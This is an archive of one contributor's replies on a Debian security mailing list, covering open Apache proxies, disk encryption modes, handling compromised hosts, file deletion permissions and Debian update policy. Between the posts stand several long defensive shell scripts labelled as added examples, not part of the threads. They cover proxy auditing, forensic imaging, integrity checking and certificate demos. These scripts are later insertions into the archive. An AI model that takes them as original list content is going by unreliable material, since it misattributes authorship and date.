BTW: Exchange Server does this.

Gruss
Bernd





Re: apache2 forwarding emails

2005-08-14 Thread Bernd Eckenfels
In article [EMAIL PROTECTED] you wrote:
 I stopped down apache2 temporarily now.

Does it help to stop apache? I see some possible sources for these POST
requests:

a) directly by a browser (unlikely, check client IP)
b) by a client behind squid (likely, check squid log)
c) by apache redirect/proxy (see below)
d) by a forwarding CGI on apache (unlikely, check access log)

If you claim it helps to shut down apache, then please check if you have
the proxy module enabled in apache and forgot to secure it by ACL.

Greetings
Bernd
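The check behind point c), as an added example that is not part of this post: a small shell audit of an Apache configuration file that reports whether mod_proxy is enabled as a forward proxy (`ProxyRequests On`) without a restricting `<Proxy *>` container, which is exactly the "forgot to secure it by ACL" case. It reads only the one file you pass it (Include directives are not followed, an assumption a real audit has to lift), and the sample configurations in the test are constructed.

```shell
#!/bin/sh
# Added example (not from the thread): is this Apache config an open forward proxy?
# Verdicts printed by check_apache_proxy:
#   no-forward-proxy          ProxyRequests is not "On" (ProxyPass reverse proxying is unaffected)
#   forward-proxy-restricted  ProxyRequests On, and a <Proxy *> container denies by default
#   open-proxy-risk           ProxyRequests On with no restricting <Proxy *> container
# Limitation: only the file given is read; Include'd files are not followed.

# _strip CONF -> config text without comments and blank lines
_strip() {
    sed -e 's/#.*//' -e '/^[[:space:]]*$/d' "$1"
}

# _proxy_star_block CONF -> the lines of the <Proxy *> ... </Proxy> container, if present
_proxy_star_block() {
    _strip "$1" | awk '
        tolower($0) ~ /<proxy[ \t]*\*>/ { inside = 1 }
        inside                           { print }
        tolower($0) ~ /<\/proxy>/       { inside = 0 }'
}

# check_apache_proxy CONF -> prints one of the three verdicts above
check_apache_proxy() {
    conf=$1
    if ! _strip "$conf" | grep -qiE '^[[:space:]]*ProxyRequests[[:space:]]+On[[:space:]]*$'; then
        echo no-forward-proxy
        return 0
    fi
    block=$(_proxy_star_block "$conf")
    # Apache 2.0/2.2 style: "Order deny,allow" + "Deny from all" (then Allow from your nets);
    # Apache 2.4 style: "Require ip ..." / "Require local". "Require all granted" is still open.
    if printf '%s\n' "$block" | grep -qiE '^[[:space:]]*(Deny[[:space:]]+from[[:space:]]+all|Require[[:space:]]+(ip|local|host))'; then
        echo forward-proxy-restricted
    else
        echo open-proxy-risk
    fi
}

# Usage: sh apache_proxy_check.sh /etc/apache2/apache2.conf
if [ $# -eq 1 ]; then
    check_apache_proxy "$1"
fi
```

Run it against every file Apache loads, not just the main one; a `ProxyRequests On` buried in a virtual host include is the common way this slips through.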





Re: On Mozilla-* updates

2005-08-04 Thread Bernd Eckenfels
In article [EMAIL PROTECTED] you wrote:
 Read this thread again.

We do need an DSA.

Gruss
Bernd





Re: On Mozilla-* updates

2005-08-01 Thread Bernd Eckenfels
In article [EMAIL PROTECTED] you wrote:
 If I recommend to use another operating system for a more special purpose, 
 what's wrong here? 

It is just the wrong answer in a discussion where we look to improve Debian.
I think it is valid to point to other systems for learning their weakness or
strength, but it is not valid to consider them as a general solution to a
Debian problem.

That said, I do still think that Ubuntu is better suited for the Desktop
exactly because the Software is fresher. And I do think a faster release
schedule would also benefit Debian. We would concentrate much more on the
overall progress. And the diversion to upstream is much less.

Independently from that, I do think Mozilla's bugfix releases should go 1:1
into the Distribution. There is no major incompatibility and it is just
wrong to expect the end user to understand about our backporting, especially
with components which are so prominent.

Gruss
Bernd





Re: On Mozilla-* updates

2005-07-31 Thread Bernd Eckenfels
In article [EMAIL PROTECTED] you wrote:
 Despite of the fact, the release is probably unable to match the mozilla 
 release cycles - do you really think, mozilla is the one and only package, 
 debian is all about? Well, I mean the killer application, the thing that 
 justifies Debian?

No, but I think most of the desktop packages suffer from the slow release cycle.

bernd





Re: On Mozilla-* updates

2005-07-30 Thread Bernd Eckenfels
In article [EMAIL PROTECTED] you wrote:
 Be prepared for reality, in half a year or in one year, there won't be
 1.0.x Mozilla Firefox packages anymore that build on Debian stable.
 At least that's what I anticipate.

So lets solve this and release more often.

Gruss
Bernd





Re: a compromised machine

2005-07-24 Thread Bernd Eckenfels
In article [EMAIL PROTECTED] you wrote:
 I still haven't managed to find out how exactly this happened. And 
 probably reinstall will be needed? What do you think?

Yes, reinstall on compromised hosts is always needed, however you should
make an image of the system for forensics, you don't want to have that happen
again. Maybe try to run some rootkit detectors.

Is there a web server with PHP running on the system? Any other server?

Gruss
Bernd





Re: Document the bug fix policy regarding PHP Safe Mode

2005-07-19 Thread Bernd Eckenfels
In article [EMAIL PROTECTED] you wrote:
 Where does this observation come from and do we know whether it's
 true for debian? I certainly know a higher proportion of multi-user
 servers with PHP installed than the proportion of desktop systems
 I know with PHP.

Yes, I think PHP is the only web-server built-in scripting language which is
widely in use by web hosters.

Gruss
Bernd





Re: getting the MAC address from an ip

2005-06-24 Thread Bernd Eckenfels
In article [EMAIL PROTECTED] you wrote:
 How can I get a machines mac address, if I only know it's ip?

If it is on your local network you can ping it and then use arp -a. If it
is remote you can't. (You need to login or use other applications which use
the MAC for stuff like UUID generation.)

BTW: this is a linux user question.

Bernd






Re: safety of encrypted filesystems

2005-06-22 Thread Bernd Eckenfels
In article [EMAIL PROTECTED] you wrote:
 You could always run tripwire on the mounted file system, unmount it,
 change your block, remount it, and run a tripwire check.  This should
 identify *WHICH* file changed.

He has only one file and this was unaltered; the question is why.

Bernd





Re: safety of encrypted filesystems

2005-06-17 Thread Bernd Eckenfels
In article [EMAIL PROTECTED] you wrote:
 Of course blocks are small, e.g. 64 bytes. However, doesn't CBC or
 ECB make sure that every block is chained to its predecessor, making
 even the very last block of a file dependent on the bits of the very
 first block?

It is therefore better to use counter mode for clusters.

Bernd
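To make the chaining question measurable, an added example that is not part of this thread: it encrypts a constructed 128-byte plaintext with AES-128 in CBC and in CTR mode using the openssl command-line tool, corrupts one byte of ciphertext inside block 3, decrypts, and counts how many plaintext bytes differ in block 3, in block 4, and everywhere else. Key and IV are fixed demo values, not secrets; the script prints `skip` if openssl is not installed.

```shell
#!/bin/sh
# Added example (not from the thread): effect of one corrupted ciphertext byte
# under AES-128-CBC versus AES-128-CTR, measured with the openssl(1) tool.
# Fixed demo key/IV so runs are repeatable; never reuse a fixed IV for real data.

KEY=000102030405060708090a0b0c0d0e0f    # demo key (16 bytes, hex)
IV=0f0e0d0c0b0a09080706050403020100     # demo IV / initial counter block
BLOCKS=8                                # plaintext length: 8 * 16 = 128 bytes
HIT=53                                  # corrupt byte offset 53, i.e. byte 5 of block 3

# damage_report MODE   (MODE is cbc or ctr)
# Prints "<differing bytes in block 3> <in block 4> <in all other blocks>",
# or "skip" when openssl is not available.
damage_report() {
    mode=$1
    command -v openssl >/dev/null 2>&1 || { echo skip; return 0; }
    d=$(mktemp -d)

    # Constructed plaintext: 128 bytes of 'A'
    awk -v n=$((BLOCKS * 16)) 'BEGIN { for (i = 0; i < n; i++) printf "A" }' > "$d/pt"

    # -nopad: the input is an exact multiple of the block size, no PKCS#7 padding
    openssl enc "-aes-128-$mode" -K "$KEY" -iv "$IV" -nopad -in "$d/pt" -out "$d/ct"

    # Replace ciphertext byte HIT with a value guaranteed to differ (1..254)
    v=$(od -An -tu1 -j "$HIT" -N 1 "$d/ct" | tr -d ' ')
    n=$(( v % 254 + 1 ))
    {
        head -c "$HIT" "$d/ct"
        printf "$(printf '\\%03o' "$n")"
        tail -c +$((HIT + 2)) "$d/ct"
    } > "$d/ct_damaged"

    openssl enc -d "-aes-128-$mode" -K "$KEY" -iv "$IV" -nopad \
        -in "$d/ct_damaged" -out "$d/pt_damaged"

    # cmp -l lists 1-based offsets of differing bytes; bucket them by 16-byte block
    cmp -l "$d/pt" "$d/pt_damaged" | awk '
        { b = int(($1 - 1) / 16); if (b == 3) a++; else if (b == 4) c++; else o++ }
        END { printf "%d %d %d\n", a + 0, c + 0, o + 0 }'
    rm -rf "$d"
}

# Usage: sh cbc_vs_ctr.sh run
if [ "${1:-}" = run ]; then
    for m in cbc ctr; do printf '%s: ' "$m"; damage_report "$m"; done
fi
```

Under CBC the damaged block decrypts to 16 bytes of garbage and the following block gets exactly one flipped byte; everything after that is intact, so on the decryption side the chain does not run to the end of the file. Under CTR only the one byte is affected. The caveat that cuts the other way: CTR with a fixed per-sector IV reuses keystream whenever a sector is rewritten, which is why disk encryption later moved to tweakable modes such as XTS.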





Re: safety of encrypted filesystems

2005-06-17 Thread Bernd Eckenfels
In article [EMAIL PROTECTED] you wrote:
 So encrypted block devices are not really more dangerous than
 clear-text in the end... I suppose with AES you end up losing at
 least 64 bytes of data, which could be less without encryption...

You lose much more with RAID-5, yes.

Greetings
Bernd





Re: safety of encrypted filesystems

2005-06-17 Thread Bernd Eckenfels
In article [EMAIL PROTECTED] you wrote:
 Nope. Someone raised the point of a file with all zeroes being
 possibly sparse, but I don't think that's the case if I wrote it
 with

Have you unmounted the file before writing to it? Perhaps your change was
overwritten with the block from cache.





Re: Crypto File System-Problems Creating One

2005-06-08 Thread Bernd Eckenfels
In article [EMAIL PROTECTED] you wrote:
 losetup -e aes-256 /dev/loop0 /dev/hda10

What do you have defined in modules?

alias cipher-16 rijndael

You also need the cryptoloop module in order to name ciphers by name. Try -E
16 instead.

Greetings
Bernd





Re: Dns refresh

2005-04-27 Thread Bernd Eckenfels
In article [EMAIL PROTECTED] you wrote:
 Hello, I have a server and I changed the ip number of the server and the
 nameserver (and restarted the services) but when i try to reach the
 server, it goes to the old ip. How can I make the dns to refresh the ip
 number?

Check for entries in /etc/hosts on the client and look for an nscd process
and kill it. You might also check if your client is using another
nameserver, in that case the TTL is responsible. Try dig a servername on
the client to see which nameserver responds with which value.

BTW: you are on the wrong list, try debian-users, please

Gruss
Bernd





Re: Hash database

2005-04-09 Thread Bernd Eckenfels
In article [EMAIL PROTECTED] you wrote:
  if [ -f $tmpdir/md5sums ] ; then
    cat $tmpdir/md5sums >> $targetfile
  else
    echo No md5sums for $deb!

It is most likely better to calculate the md5sums for the files, since not
all packages have the md5sums, and it is expected that dpkg calculates them
instead.

Gruss
Bernd





Re: using sarge on production machines

2005-02-19 Thread Bernd Eckenfels
In article [EMAIL PROTECTED] you wrote:
 I also think sarge will be used more and more over the next few weeks
 and months whether it is released or not, certainly where security is
 not such a big issue.

Well, if you need a secure samba or recent PHP, you may not have an option.

Greetings
Bernd





Re: Compromised system - still ok?

2005-02-15 Thread Bernd Eckenfels
In article [EMAIL PROTECTED] you wrote:
  - for forensics.. use a good cd or build a custom disk
  with with lot of fun forensics on it and fiddle till one finds
  all the answers :-0
 
 Make sure that you don't do forensics on the original image.  Investigating 
 the situation may require running fsck etc which changes things.

And talking about forensics: use script to generate a complete typescript
of your forensics session.

Greetings
Bernd





Re: Cyrus21 does not work corectly with SSL

2005-02-14 Thread Bernd Eckenfels
In article [EMAIL PROTECTED] you wrote:
 'Toto Root CA' seems to be a self signed certificate instead of an
 independent certificate as your root certificate. You don't have to
 self sign a root certificate.

You need a signature on all certificates, so root certificates are self-signed.

Bernd
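What that looks like in practice, as an added example that is not part of this post: a throwaway root CA signs itself (its issuer name equals its subject name) and then signs a server certificate, and `openssl verify` accepts the server certificate only when the root is supplied as the trust anchor. The names are demo values, the openssl config is written inline so the script does not depend on the system openssl.cnf, and the script does nothing if openssl is missing.

```shell
#!/bin/sh
# Added example (not from the thread): a root CA certificate is signed with
# its own key (issuer == subject); a server certificate is signed by the root.
# Uses a private minimal openssl config so it does not depend on the system
# openssl.cnf. Names below are demo values.

# make_demo_pki DIR -> root.key/root.pem and server.key/server.pem in DIR; returns 1 without openssl
make_demo_pki() {
    dir=$1
    command -v openssl >/dev/null 2>&1 || return 1
    cat > "$dir/ca.cnf" <<'EOF'
[req]
distinguished_name = dn
x509_extensions    = v3_ca
[dn]
[v3_ca]
basicConstraints = critical,CA:TRUE
keyUsage         = critical,keyCertSign,cRLSign
EOF
    # Root: "req -x509" emits a certificate signed by the key it just generated
    openssl req -x509 -new -newkey rsa:2048 -nodes -days 3650 \
        -subj '/CN=Toto Root CA' -config "$dir/ca.cnf" \
        -keyout "$dir/root.key" -out "$dir/root.pem" 2>/dev/null || return 1
    # Server: a CSR signed with the server key ...
    openssl req -new -newkey rsa:2048 -nodes \
        -subj '/CN=imap.example.test' -config "$dir/ca.cnf" \
        -keyout "$dir/server.key" -out "$dir/server.csr" 2>/dev/null || return 1
    # ... turned into a certificate by the root's signature
    openssl x509 -req -in "$dir/server.csr" -days 365 \
        -CA "$dir/root.pem" -CAkey "$dir/root.key" -CAcreateserial \
        -out "$dir/server.pem" 2>/dev/null || return 1
}

# is_self_signed CERT -> yes/no: is the issuer name equal to the subject name?
# (A name match alone is not proof; chain_ok CERT CERT also checks the signature.)
is_self_signed() {
    s=$(openssl x509 -in "$1" -noout -subject | sed 's/^subject=[[:space:]]*//')
    i=$(openssl x509 -in "$1" -noout -issuer  | sed 's/^issuer=[[:space:]]*//')
    if [ "$s" = "$i" ]; then echo yes; else echo no; fi
}

# chain_ok CERT CAFILE -> ok/fail: does CERT verify against the trust anchors in CAFILE?
chain_ok() {
    if openssl verify -CAfile "$2" "$1" >/dev/null 2>&1; then echo ok; else echo fail; fi
}

# Usage: sh demo_pki.sh /tmp/pki
if [ -n "${1:-}" ]; then
    mkdir -p "$1" && make_demo_pki "$1" || exit 1
    for c in root server; do
        printf '%s.pem self-signed: %s\n' "$c" "$(is_self_signed "$1/$c.pem")"
    done
    printf 'server.pem against root.pem:   %s\n' "$(chain_ok "$1/server.pem" "$1/root.pem")"
    printf 'server.pem against server.pem: %s\n' "$(chain_ok "$1/server.pem" "$1/server.pem")"
fi
```

For the Cyrus case this means the client needs the self-signed root installed as a trust anchor; the server presents its own certificate (plus any intermediates), and the chain ends at that root.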





Re: IDNA and security

2005-02-08 Thread Bernd Eckenfels
In article [EMAIL PROTECTED] you wrote:
 The name is what associates a CA signature with a site. They're not
 signing the IP number.

The Browser is checking the address against the DN itself. So if the padlock
is blue, the certificate is for the current URL. Then you have to check the
content of the certificate to see who owns it. There is no special value in the
name. debian.xx does not belong to debian, as long as the Certificate is
not for debian.

IDN attacks against the URL are for site spoofings which attack users who
do not use SSL certificates. And those are always at a higher risk.

Greetings
Bernd





Re: Compromised system - still ok?

2005-02-07 Thread Bernd Eckenfels
In article [EMAIL PROTECTED] you wrote:
 I co-administer a system with ~ 250 users, a significant part of them I
 don't know very well personally, and really, I don't rule out some of
 them might try to do some cracking, of, more likely, has such a shoddy
 password policy or infected windows system that their account will be
 used to.
 
 Should I now reinstall these systems daily?

Well, the problem is of course root compromise. However, on such a system,
break-ins are very likely and you better do checks regularly. This is to
protect your users.

 In both my case, and the thread starter's case, a normal user account
 might or was definitely in the hands of someone malicious. In both
 cases, no evidence whatsoever was there that there was even an attempt
 at becoming root.

Then a re-install might not be needed. At least if you can explain how the
user account could have been compromised.

Bernd





Re: Compromised system - still ok?

2005-02-07 Thread Bernd Eckenfels
In article [EMAIL PROTECTED] you wrote:
- works great across the usa, even if the cracked
box they came from was offshore, they can trace it
back to somebody's bedroom or colo

Is that first-hand knowledge or just the usual urban legend?

Greetings
Bernd





Re: Compromised system - still ok?

2005-02-06 Thread Bernd Eckenfels
In article [EMAIL PROTECTED] you wrote:
 you can reinstall AFTER you can answer all the above questions
 or give up and give the point ot the script kiddie cracker

No, you make an image, reinstall, and if you have time (i.e. you normally
don't) then you can start the forensics.

Gruss
Bernd
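Three posts in this set give the same advice: image first, reinstall, analyse the image later, and log the session with script(1). As an added example that is not Bernd's code, here is the imaging step as a shell script: it copies the device with dd, hashes source and copy, records the hash in a form that can be re-checked later, and makes the evidence read-only. The "device" path is whatever you pass in (a block device in practice, a constructed file in the test); GNU dd and sha256sum are assumed.

```shell
#!/bin/sh
# Added example (not from the thread): take a forensic image of a compromised
# disk before reinstalling, hash it, and keep a record you can re-check later.
# Work on a copy of the image afterwards; the original image stays read-only.

# image_device SRC DST LOG -> prints "ok" when DST hashes identical to SRC, else "MISMATCH"
image_device() {
    src=$1; dst=$2; log=$3
    # conv=noerror,sync: keep reading past bad sectors, padding them with zeros so the
    # image keeps the original offsets. bs=512 is sector-sized, so a whole block device
    # is never padded at the end (raise bs for speed once you accept a zero-padded tail).
    # dd's own summary and any read errors go to the log.
    dd if="$src" of="$dst" bs=512 conv=noerror,sync 2>>"$log" || return 1
    src_hash=$(sha256sum < "$src" | cut -d' ' -f1)
    dst_hash=$(sha256sum < "$dst" | cut -d' ' -f1)
    # Store the hash next to the image in "sha256sum -c" format (basename only,
    # so the check still works after the image has been moved elsewhere)
    ( cd "$(dirname "$dst")" && sha256sum "$(basename "$dst")" > "$(basename "$dst").sha256" )
    chmod 444 "$dst" "$dst.sha256"        # evidence is read-only from here on
    printf '%s image %s -> %s sha256=%s\n' \
        "$(date -u +%Y-%m-%dT%H:%M:%SZ)" "$src" "$dst" "$dst_hash" >> "$log"
    if [ "$src_hash" = "$dst_hash" ]; then echo ok; else echo MISMATCH; fi
}

# verify_image DST -> prints "ok" if DST still matches its recorded hash, else "TAMPERED"
verify_image() {
    dst=$1
    if ( cd "$(dirname "$dst")" && sha256sum -c --status "$(basename "$dst").sha256" ); then
        echo ok
    else
        echo TAMPERED
    fi
}

# Usage: sh image_disk.sh /dev/sdb /evidence/host-sdb.img /evidence/host.log
case $# in
    3) image_device "$1" "$2" "$3" ;;
    1) verify_image "$1" ;;
esac
```

A MISMATCH with read errors in the log means the source itself could not be read reliably, so document it rather than retrying until the hashes agree. Run the whole session under `script -a forensics.typescript`, and mount the working copy read-only (`mount -o ro,loop,noexec,nodev`) when you get around to the analysis.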





Re: woody kernel image

2005-01-29 Thread Bernd Eckenfels
In article [EMAIL PROTECTED] you wrote:
 There are Security Updates for kernel 2.4.18
 
 The last update for kernel-source-2.4.18 in stable was in April 2004.

BTW: I wonder why http://packages.qa.debian.org/k/kernel-source-2.4.18.html
contains the latest version 2.4.18-14.3 but no entry in the latest news for
it.

Greetings
Bernd





Re: auth log

2005-01-27 Thread Bernd Eckenfels
In article [EMAIL PROTECTED] you wrote:
 Does any body know what this is mean:
 
 su[32278]: + ??? root-nobody
 
 I found this line in my auth.log file.

It means some root process has used su to drop privileges and become
nobody. cron jobs are known to do that.

Gruss
Bernd





Re: File System Integrity Checker for Sarge

2005-01-02 Thread Bernd Eckenfels
In article [EMAIL PROTECTED] you wrote:
 Is there one that stands out as being easy to configure/tune for Sarge ?

integrit is pretty easy methinks.

Greetings
Bernd
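As an added example that is not from the list, and that also covers the hash-database question further up (computing the sums yourself rather than trusting each package to ship them): the minimal form of what integrit and friends do, a snapshot of file hashes and a later comparison that reports changed, added and missing files. It uses sha256sum rather than md5sum, walks whatever tree you point it at, and assumes file names without newlines; dpkg's own per-package lists, for comparison, live in /var/lib/dpkg/info/*.md5sums.

```shell
#!/bin/sh
# Added example (not from the thread): a minimal file-system integrity check.
# Record a hash database of a tree, later compare the tree against it.
# Keep the database off the host (read-only media, another machine); a database
# an intruder can rewrite proves nothing. File names with newlines are not handled.

# _snapshot ROOT -> "<sha256>  ./relative/path" lines, sorted by path
_snapshot() {
    ( cd "$1" && find . -type f -print0 | LC_ALL=C sort -z | xargs -0 -r sha256sum )
}

# baseline_create ROOT DB -> write the hash database
baseline_create() {
    _snapshot "$1" > "$2"
}

# baseline_check ROOT DB -> prints "changed|added|missing <path>" lines, nothing if clean
baseline_check() {
    root=$1; db=$2
    cur=$(mktemp)
    _snapshot "$root" > "$cur"
    awk -v db="$db" '
        FILENAME == db { old[$2] = $1; next }     # first file: the baseline
        {                                         # second file: current state
            if (!($2 in old))       print "added " $2
            else if (old[$2] != $1) print "changed " $2
            delete old[$2]
        }
        END { for (p in old) print "missing " p }
    ' "$db" "$cur" | LC_ALL=C sort
    rm -f "$cur"
}

# Usage: sh baseline.sh create /  /media/ro/host.db
#        sh baseline.sh check  /  /media/ro/host.db
case "${1:-}" in
    create) baseline_create "$2" "$3" ;;
    check)  baseline_check  "$2" "$3" ;;
esac
```

Run the check from a clean boot medium if you can; a kernel-level rootkit on the host can answer the read() calls with the original content.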





Re: rm files owned by root?

2005-01-02 Thread Bernd Eckenfels
In article [EMAIL PROTECTED] you wrote:
 So if my /home/ is 775 and root.users and I'm in the group users I can
 delete everybody's home directory?

You need write access to the /home dir, then you can delete other users'
homes. But to delete a directory, it must be empty. And you can't empty it if
you can't get into it or have write access inside.

However you can delete empty dirs and files if you don't own them or have
write access to them, yes.

Greetings
Bernd





Re: rm files owned by root?

2005-01-02 Thread Bernd Eckenfels
In article [EMAIL PROTECTED] you wrote:
 Not on linux.

Well, he can of course remove the directory entry with a fs debug tool or
disk editor. But that's not possible with user rights w/o raw access rights
to the device. However I think sys_unlink won't do it. I was looking for the
source but this special policy is a bit hidden in all filesystems.

Gruss
Bernd





Re: rm files owned by root?

2005-01-02 Thread Bernd Eckenfels
In article [EMAIL PROTECTED] you wrote:
 Removing a directory requires write permission on the directory
 itself, because you have to delete the . and .. links inside the
 directory.

no:

[EMAIL PROTECTED]:~# mkdir /home/test
[EMAIL PROTECTED]:~# chmod 0 /home/test
[EMAIL PROTECTED]:~# ls -ld /home /home/test
drwxrwxr-x  12 root adm 123 Jan  2 22:12 /home/
d---------   2 root root   6 Jan  2 22:14 /home/test/
[EMAIL PROTECTED]:~# exit
[EMAIL PROTECTED]:~ id
uid=1001(ecki) gid=1001(ecki) 
groups=0(root),4(adm),20(dialout),24(cdrom),29(audio),38(list),1001(ecki)
[EMAIL PROTECTED]:~ rmdir /home/test

Greetings
Bernd





Re: rm files owned by root?

2005-01-02 Thread Bernd Eckenfels
In article [EMAIL PROTECTED] you wrote:
 if you are in group adm and the /home allows adm group to write to it,
 you will be able to remove the directory test? inside /home/

Yes, that's what this thread is about. I can remove an *empty* dir, even if I
don't have permissions inside the dir. All I need is write access to the
parent. If it is not empty, I need to be able to empty it first, which
requires write and execute access to the dir (and children).

Greetings
Bernd





Re: rm files owned by root?

2004-12-29 Thread Bernd Eckenfels
In article [EMAIL PROTECTED] you wrote:
 It asks if I want to remove this file, since it's write protected. If I
 say y, then the file gets deleted. But it shouldn't be! Should it?

This is a Unix FAQ. You can delete any file if you have write access to the
directory. Actually you don't delete the file, you remove the link to the
file from the dir. Only if it is the last link in the directory structure
will the file be removed and the area freed.

Greetings
Bernd
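The rules this thread arrives at, as an added example that is not from any of the posts: a script that builds each situation in a temporary directory and reports whether rm or rmdir succeeds. It demonstrates that the directory's write bit decides unlink, that an empty mode-0 directory can be removed when its parent is writable, that a non-empty one cannot, and that unlinking one name leaves the data reachable through another hard link. Run it as an ordinary user; root bypasses these checks (the script reports `root` for the affected case when uid 0 runs it).

```shell
#!/bin/sh
# Added example (not from the thread): which permission bits decide whether
# rm/rmdir succeed. Run it as an ordinary user; root bypasses discretionary
# access checks, so the "denied by permissions" case reports "root" for uid 0.

# try_rm PATH   -> prints "removed" or "denied"
try_rm() {
    if rm -f -- "$1" 2>/dev/null && [ ! -e "$1" ]; then echo removed; else echo denied; fi
}

# try_rmdir DIR -> prints "removed" or "denied"
try_rmdir() {
    if rmdir -- "$1" 2>/dev/null; then echo removed; else echo denied; fi
}

# A mode-000 file inside a directory we can write to: the directory decides, so it goes.
case_unwritable_file_in_writable_dir() {
    d=$(mktemp -d)
    : > "$d/f"; chmod 000 "$d/f"
    try_rm "$d/f"                               # removed
    rm -rf "$d"
}

# A mode-666 file inside a directory we cannot write to: the file's own bits do not help.
case_writable_file_in_unwritable_dir() {
    d=$(mktemp -d)
    : > "$d/f"; chmod 666 "$d/f"; chmod 555 "$d"
    if [ "$(id -u)" -eq 0 ]; then echo root; else try_rm "$d/f"; fi   # denied
    chmod 755 "$d"; rm -rf "$d"
}

# An empty mode-000 directory whose parent is writable: rmdir needs no access inside it.
case_rmdir_empty_mode0_dir() {
    d=$(mktemp -d)
    mkdir "$d/sub"; chmod 000 "$d/sub"
    try_rmdir "$d/sub"                          # removed
    rm -rf "$d"
}

# The same, but non-empty: we cannot enter it to empty it, and rmdir refuses non-empty dirs.
case_rmdir_nonempty_mode0_dir() {
    d=$(mktemp -d)
    mkdir "$d/sub"; : > "$d/sub/f"; chmod 000 "$d/sub"
    try_rmdir "$d/sub"                          # denied (ENOTEMPTY, even for root)
    chmod 755 "$d/sub"; rm -rf "$d"
}

# rm removes one name; the data stays while another hard link exists.
case_unlink_keeps_other_link() {
    d=$(mktemp -d)
    printf 'payload' > "$d/a"; ln "$d/a" "$d/b"
    rm -- "$d/a"
    cat "$d/b"; echo                             # payload
    rm -rf "$d"
}

# Usage: sh unlink_semantics.sh run
if [ "${1:-}" = run ]; then
    for c in case_unwritable_file_in_writable_dir case_writable_file_in_unwritable_dir \
             case_rmdir_empty_mode0_dir case_rmdir_nonempty_mode0_dir \
             case_unlink_keeps_other_link; do
        printf '%-40s %s\n' "$c" "$($c)"
    done
fi
```

The one bit the thread does not mention is the sticky bit (mode 1777, as on /tmp): with it set, write access to the directory is no longer enough, and only the owner of the entry, the owner of the directory, or root may unlink it.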





Re: php vulnerabilities

2004-12-23 Thread Bernd Eckenfels
In article [EMAIL PROTECTED] you wrote:
 IOW, the soaking period is required.

But we don't hide bugs. And given the voluntary nature of Debian a lot of
fixes just won't happen before the vulnerability is widely known, anyway.
Just see the current samba problem.

And besides the openssh disaster I don't see many destructive security
patches, especially not with Debian's conservative backporting strategy.

Greetings
Bernd





Re: php vulnerabilities

2004-12-23 Thread Bernd Eckenfels
On Thu, Dec 23, 2004 at 11:48:34PM +0100, Florian Weimer wrote:
  IOW, the soaking period is required.
..
 Sorry for being unclear.  The soaking period starts *after* the issue
 has been published.

Does this mean we will not provide patches, or does it mean we will provide them
for the user to choose? The first is I guess not acceptable, and the latter is
current policy. You do not have to install the patches if you want to let
them soak.

Greetings
Bernd
-- 
  (OO)  -- [EMAIL PROTECTED] --
 ( .. )  [EMAIL PROTECTED],linux.de,debian.org}  http://www.eckes.org/
  o--o 1024D/E383CD7E  [EMAIL PROTECTED]  v:+497211603874  f:+497211606754
(OO)  When cryptography is outlawed, bayl bhgynjf jvyy unir cevinpl!





Re: php vulnerabilities

2004-12-23 Thread Bernd Eckenfels
Hello Florian,

On Fri, Dec 24, 2004 at 12:37:24AM +0100, Florian Weimer wrote:
 Look at the Mozilla version in stable, and the issues surrounding it,
 and you will understand.

Yes, actually I really think that backporting is not possible nor effective
in a lot of situations. And yes you are right, a new upstream version needs
soaking. However this discussion is therefore quite theoretical, I see
currently nearly no way for any major update to slip into stable.

Too many core maintainers would object. It is more likely the
software is removed on a revision. (And I am not sure if that is a good
solution, especially for commonly used programs.)

Mozilla is a quite interesting subject to study: it might break a lot of
stuff if upgraded (due to the libs), and it is extremely complicated to
backport the fixes (since no patch list is available).

And even if (or especially when!) Debian developers succeed in fixing all the
bugs by backporting, the user would be frustrated by having to live with
outdated versions.

(I think this is true for most productivity applications and less true for
server apps where conservative patching makes sense and is more common
upstream anyway. (And less complicated to backport single fixes.))

This is somewhat the Microsoft problem - GUI software and multi-function
packages are simply not sanely maintainable.

Gruss
Bernd
-- 
  (OO)  -- [EMAIL PROTECTED] --
 ( .. )  [EMAIL PROTECTED],linux.de,debian.org}  http://www.eckes.org/
  o--o 1024D/E383CD7E  [EMAIL PROTECTED]  v:+497211603874  f:+497211606754
(OO)  When cryptography is outlawed, bayl bhgynjf jvyy unir cevinpl!





Re: [SECURITY] [DSA-594-1] New Apache packages fix arbitrary code execution

2004-11-18 Thread Bernd Eckenfels
In article [EMAIL PROTECTED] you wrote:
 If I'm not mistaken the vulnerabilities existed in two files found in
 apache-common.

Does anybody know why the vuln is classified as a remote exploit? Aren't SSI
tags dependent on local modifications? Or are there tags which can be remotely
exploited, if used?

Gruss
Bernd





Re: Who runs the buildds?

2004-11-16 Thread Bernd Eckenfels
In article [EMAIL PROTECTED] you wrote:
 Are there any buildds run by non-DDs? Do any non-DDs have access to
 any buildds?

I think for 99% of all Debian systems physical access exists for non-DDs.

Greetings
Bernd





Re: Providing secure file access on a colo-server

2004-10-09 Thread Bernd Eckenfels
In article [EMAIL PROTECTED] you wrote:
 I need to provide a way for users to upload/download files from their
 shell accounts on a colo server I admin. The majority of the users
 wont want to use scp/sftp and are clueless 

winscp.

Greetings
Bernd
-- 
eckes privat - http://www.eckes.org/
Project Freefire - http://www.freefire.org/





Re: [OT] Collective memory query

2004-09-27 Thread Bernd Eckenfels
In article [EMAIL PROTECTED] you wrote:
 Alternately, with sed:
 
 ] sed -si.orig -e '...' `find . -name '...'`
 
 More safely, but with more forks:
 
 ] find . -name '...' -print0 | xargs -0 sed -si.orig -e '...'

BTW: I don't see how xargs would do more forks than the shell. Because the
above version will fork once or not at all (if the argument list is too long)
and the below solution will fork as much as needed (which is once in case the
list fits into the command line). So xargs only forks one more than the
backtick version.

Greetings
Bernd
-- 
eckes privat - http://www.eckes.org/
Project Freefire - http://www.freefire.org/





Re: [OT] Collective memory query

2004-09-27 Thread Bernd Eckenfels
In article [EMAIL PROTECTED] you wrote:
 Last time I read the xargs documentation it stated that using '\0' as an
 input separator would also tell it to pass at most one argument to the
 command.

 echo -en 'a\0b\0c' | xargs -t -0 echo
echo a b c
a b c
 echo -en 'a\0b\0c' | xargs -t -s 8 -0 echo
echo a
a
echo b
b
echo c
c

Looks like it has changed, the default is to fill up the command line even
with the -0 arg, unless the max line length is specified.

Greetings
Bernd
-- 
eckes privat - http://www.eckes.org/
Project Freefire - http://www.freefire.org/





Re: Rebuilding packages on *all* architectures

2004-09-24 Thread Bernd Eckenfels
In article [EMAIL PROTECTED] you wrote:
 But what if the source is modified?

This will be the next step to solve. However I think not having a solution
for that problem should not prevent us from having a sane bootstrap
environment and using it.

One idea could be to have an automatic way to check differences between
.orig.tar.gz and upstream source, for example.

Gruss
Bernd
-- 
eckes privat - http://www.eckes.org/
Project Freefire - http://www.freefire.org/





Re: failed root login attempts

